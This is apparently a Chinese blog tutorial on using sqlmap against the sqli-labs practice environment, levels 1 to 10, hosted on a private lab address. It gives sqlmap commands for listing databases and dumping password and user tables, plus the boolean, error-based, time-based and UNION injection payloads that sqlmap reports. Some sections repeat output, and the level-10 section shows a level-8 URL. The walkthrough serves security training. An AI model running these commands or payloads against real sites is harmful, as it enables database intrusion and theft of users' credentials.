在使用前,我们先大致介绍一下sqlmap可能的用处。
以下来自于:
版权声明:本文为CSDN博主「小明师傅」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_24030907/article/details/106541411
-
0、清除sqlmap缓存:
第一个办法:在C:\Users\dragoneyes.sqlmap\output,删除output里面的内容
第二个办法:sqlmap.py --purge
-
1、检测注入点
sqlmap -u 注入点 检测注入点是否可用
sqlmap -u 注入点 –batch 自动输入
-
2、暴库和数据库用户
sqlmap -u 注入点 –dbs //暴库
Web当前使用的数据库
sqlmap -u 注入点 –current-db //爆当前使用的库
-
- Web数据库使用的账户
sqlmap -u 注入点 –current-user //当前使用的账户
- Web数据库使用的账户
-
- 列出sqlserver所有用户
sqlmap -u 注入点 –users // 列出所有使用过的账户
- 列出sqlserver所有用户
-
3、数据库账户与密码
sqlmap -u 注入点 –passwords //mysql的登录账户和密码
-
4、列出数据库中的表
sqlmap -u 注入点 -D 指定数据库名 –tables //(-D指定数据库名称)
-
5、列出表中字段
sqlmap -u 注入点 -D 指定数据库名 -T 指定的表名 - -columns
-
6、爆字段内容
sqlmap -u 注入点 -D 指定数据库名 -T 指定表名 -C “email,username,userpassword” –dump (将结果导出)
–risk:风险等级,共有4个,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。
level:共有五个等级,默认为1,在你不确定哪个payload或者参数为注入点的时候,为了保证全面性,建议使用高的level值。
1、less01-Error Based- String
由于这个比较简单,因此我们可以直接进行最高等级的暴库:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbs
在跑数据库的过程中,我们可以发现,其实sqlmap会将有用的payload输出出来,看见这个,你懂了吗?载荷如下:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4225=4225 AND 'gZcP'='gZcP
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7170627171,(SELECT (ELT(5094=5094,1))),0x71626a7171,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'loNl'='loNl
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 1656 FROM (SELECT(SLEEP(5)))rOKe) AND 'cthH'='cthH
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8083' UNION ALL SELECT NULL,CONCAT(0x7170627171,0x424c456c79416b53754b79614463647857484654456b76454966544364767747446a737173444955,0x71626a7171),NULL-- -
---
接下来是类似于手工注入的常规步骤:
1.1、查看当前数据库
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --current-db
1.2、枚举出指定数据库中的表名–mysql -D "security"
和- - tables
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" --tables
1.3、枚举出users表中的字段-- -T "users"
和 - - col
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" --col
1.4、枚举出指定字段–-C "password,username"
和- - dump
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-1/?id=1" --level=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump
如下,数据库尽收眼底。
2、less02-Error Based- Intiger
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 6989=6989
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178626a71,(SELECT (ELT(6000=6000,1))),0x7162706271,0x78))s), 8446744073709551610, 8446744073709551610)))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1046 FROM (SELECT(SLEEP(5)))XNPi)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-3218 UNION ALL SELECT NULL,CONCAT(0x7178626a71,0x627549484c74714d6d63704b6c58725270757a6b644678537a7a714b6463415159534877596e796b,0x7162706271),NULL-- -
---
3、less03-Error Based- String (with Twist)
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 5965=5965 AND ('Uhxh'='Uhxh
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1') AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a6a7a71,(SELECT (ELT(4276=4276,1))),0x7178787671,0x78))s), 8446744073709551610, 8446744073709551610))) AND ('DhTF'='DhTF
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 5032 FROM (SELECT(SLEEP(5)))ZpJN) AND ('qjGP'='qjGP
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-8381') UNION ALL SELECT NULL,NULL,CONCAT(0x717a6a7a71,0x6244626e745745795371456665544570755652784f4c6256444c794f4e6a787a654e474f4b767255,0x7178787671)-- -
---
4、less04-Error Based- DoubleQuotes String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap identified the following injection point(s) with a total of 69 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1") AND 3072=3072#
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1") AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716a6b7071,(SELECT (ELT(5205=5205,1))),0x716b626271,0x78))s), 8446744073709551610, 8446744073709551610))) AND ("yfvD"="yfvD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1") AND (SELECT 3354 FROM (SELECT(SLEEP(5)))Cwyc) AND ("gvAz"="gvAz
Type: UNION query
Title: MySQL UNION query (NULL) - 3 columns
Payload: id=-8029") UNION ALL SELECT NULL,CONCAT(0x716a6b7071,0x724d544d6171674c56465a6c4c7247716677484e4851686a4e63676b456e587a464669414c765268,0x716b626271),NULL#
---
5、less05-Double Query- Single Quotes- String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap给出的paylaod如下:
sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7188=7188 AND 'mqLE'='mqLE
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x717a707071,(SELECT (ELT(6541=6541,1))),0x7170707a71,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'aJRC'='aJRC
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8698 FROM (SELECT(SLEEP(5)))CBFA) AND 'fmva'='fmva
---
6、less06-Double Query- Double Quotes- String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap给出的语句如下:
sqlmap identified the following injection point(s) with a total of 221 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=1" AND 4582=4582#
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1" AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x716b6b7071,(SELECT (ELT(8039=8039,1))),0x7178767a71,0x78))s), 8446744073709551610, 8446744073709551610)))-- uBIu
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1" AND (SELECT 8198 FROM (SELECT(SLEEP(5)))BnZi)-- XRBu
---
7、less07-Dump into Outfile
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap给出的语句如下:
sqlmap identified the following injection point(s) with a total of 287 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 7606=7606 AND ('QcoM'='QcoM
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 3053 FROM (SELECT(SLEEP(5)))oLyk) AND ('rXXO'='rXXO
---
8、less08-Blind- Boolian- Single Quotes- String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap给出的语句如下:
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7494=7494 AND 'UORd'='UORd
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---
9、less09-Blind- Time based- Single Quotes- String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
sqlmap给出的语句如下:
sqlmap identified the following injection point(s) with a total of 252 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 4639=4639 AND 'PEyr'='PEyr
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 8651 FROM (SELECT(SLEEP(5)))TJGQ) AND 'wKXs'='wKXs
---
10、less10-Blind- Time based- Double Quotes- String
和第一关类似,sqlmap给出的sqlmap如下:具体的语句就不一一列举了。
在查找所有数据库的时候需要列一下等级水平和风险等级,如下:
C:\Python27\sqlmap>sqlmap.py -u "http://192.168.1.177:40000/Less-8/?id=1" --current-db --level=5 --risk=3
sqlmap给出的语句如下:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 7494=7494 AND 'UORd'='UORd
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 9331 FROM (SELECT(SLEEP(5)))MYFE) AND 'sZZC'='sZZC
---